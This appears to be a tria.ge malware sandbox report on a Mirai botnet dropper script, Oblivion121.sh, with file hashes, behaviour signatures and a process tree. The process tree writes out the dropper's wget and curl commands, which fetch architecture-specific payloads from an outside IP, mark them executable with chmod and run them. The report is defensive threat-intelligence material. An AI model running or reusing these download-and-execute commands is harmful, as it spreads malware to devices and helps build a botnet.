Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Oblivion121.sh

ubuntu-18.04-amd64

10

Oblivion121.sh

debian-9-armhf

10

Oblivion121.sh

debian-9-mips

10

Oblivion121.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    15/12/2024, 10:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Oblivion121.sh

  • Size

    1KB

  • MD5

    90e5e43e5d798a41934d7f30e8208b24

  • SHA1

    0748835c71a1c54c8ea6bc7d0baf831f12eb0ef7

  • SHA256

    09e9f78247105e4500f5722131940080633c40ba32803d3f4b5b370ae5ae6233

  • SHA512

    ea39caa2f2242cd2c46b6f8841fb6e4bb8defdb2fb2dfb831f0dde5cee12707dc1aebc920c1e0834bcc7fab1aeb5caf69cf3ba56f1e6d9a5b9c4bd7b87020032

Score
10/10
miraimiraibotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

MIRAI

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (42906) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 5 IoCs
  • Modifies Watchdog functionality 1 TTPs 8 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 4 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads system network configuration 1 TTPs 4 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 12 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Oblivion121.sh
    /tmp/Oblivion121.sh
    1⤵
    • Writes file to tmp directory
    PID:698
    • /usr/bin/wget
      wget http://188.132.232.157/IGz/IGz.x86
      2⤵
      • Writes file to tmp directory
      PID:706
    • /usr/bin/curl
      curl -O http://188.132.232.157/IGz/IGz.x86
      2⤵
      • Writes file to tmp directory
      PID:719
    • /bin/cat
      cat IGz.x86
      2⤵
        PID:729
      • /bin/chmod
        chmod +x cp IGz.x86 Oblivion121.sh systemd-private-ce7c6e8a3a3f4152b6b47b0b826ed39e-systemd-timedated.service-AWdkDw
        2⤵
        • File and Directory Permissions Modification
        PID:730
      • /tmp/cp
        ./cp x86
        2⤵
        • Executes dropped EXE
        PID:731
      • /usr/bin/wget
        wget http://188.132.232.157/IGz/IGz.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:733
      • /usr/bin/curl
        curl -O http://188.132.232.157/IGz/IGz.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:734
      • /bin/cat
        cat IGz.mips
        2⤵
        • System Network Configuration Discovery
        PID:735
      • /bin/chmod
        chmod +x cp IGz.mips IGz.x86 Oblivion121.sh systemd-private-ce7c6e8a3a3f4152b6b47b0b826ed39e-systemd-timedated.service-AWdkDw
        2⤵
        • File and Directory Permissions Modification
        PID:736
      • /tmp/cp
        ./cp mips
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        PID:737
      • /usr/bin/wget
        wget http://188.132.232.157/IGz/IGz.mpsl
        2⤵
        • Writes file to tmp directory
        PID:744
      • /usr/bin/curl
        curl -O http://188.132.232.157/IGz/IGz.mpsl
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:754
      • /bin/chmod
        chmod +x cp IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh
        2⤵
        • File and Directory Permissions Modification
        PID:779
      • /tmp/cp
        ./cp mpsl
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:780
      • /usr/bin/wget
        wget http://188.132.232.157/IGz/IGz.arm4
        2⤵
          PID:784
        • /usr/bin/curl
          curl -O http://188.132.232.157/IGz/IGz.arm4
          2⤵
          • Writes file to tmp directory
          PID:815
        • /bin/chmod
          chmod +x cp IGz.arm4 IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh
          2⤵
          • File and Directory Permissions Modification
          PID:817
        • /tmp/cp
          ./cp arm4
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:818
        • /usr/bin/wget
          wget http://188.132.232.157/IGz/IGz.arm5
          2⤵
          • Writes file to tmp directory
          PID:825
        • /usr/bin/curl
          curl -O http://188.132.232.157/IGz/IGz.arm5
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:826
        • /bin/chmod
          chmod +x cp IGz.arm4 IGz.arm5 IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh
          2⤵
          • File and Directory Permissions Modification
          PID:858
        • /tmp/cp
          ./cp arm5
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:859
        • /usr/bin/wget
          wget http://188.132.232.157/IGz/IGz.arm6
          2⤵
          • Writes file to tmp directory
          PID:863
        • /usr/bin/curl
          curl -O http://188.132.232.157/IGz/IGz.arm6
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:867

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/IGz.x86
        Filesize

        72KB

        MD5

        acd283bf65ed831dd470134f403a9294

        SHA1

        3c0f8231e8089430e32ef8daea73597170a2b4c0

        SHA256

        8d4e7068fc99a8f0fc7e2b095c206fda09ade9ea61091c40405e90dd6894ed67

        SHA512

        0847ba7306de9087cd0a4f79f20de2da0baffa1e2d8c09d509b3bd573122593c935b6e39076393d08b9e2da12d89b55f70cbb3c99d42175c4daca848f00a8c72

        Download Submit

      • /tmp/cp
        Filesize

        153KB

        MD5

        558fc8df865663836770a42334dd88c0

        SHA1

        0276f7274984928e64fbe354bb0df966d1eacb86

        SHA256

        b23789685e87bf3931a7cc2c8d33dcf4417332e5d5a5cd7778f97e063f8d9118

        SHA512

        561756714ec8c40ed714e350df57f3c494e0995cfb6e0ca9146d4b47651f66b20d2c11d0fd77f3f05b92ca4ec05f3ddfb532ac92287a316354d2ea432e3fea4e

        Download Submit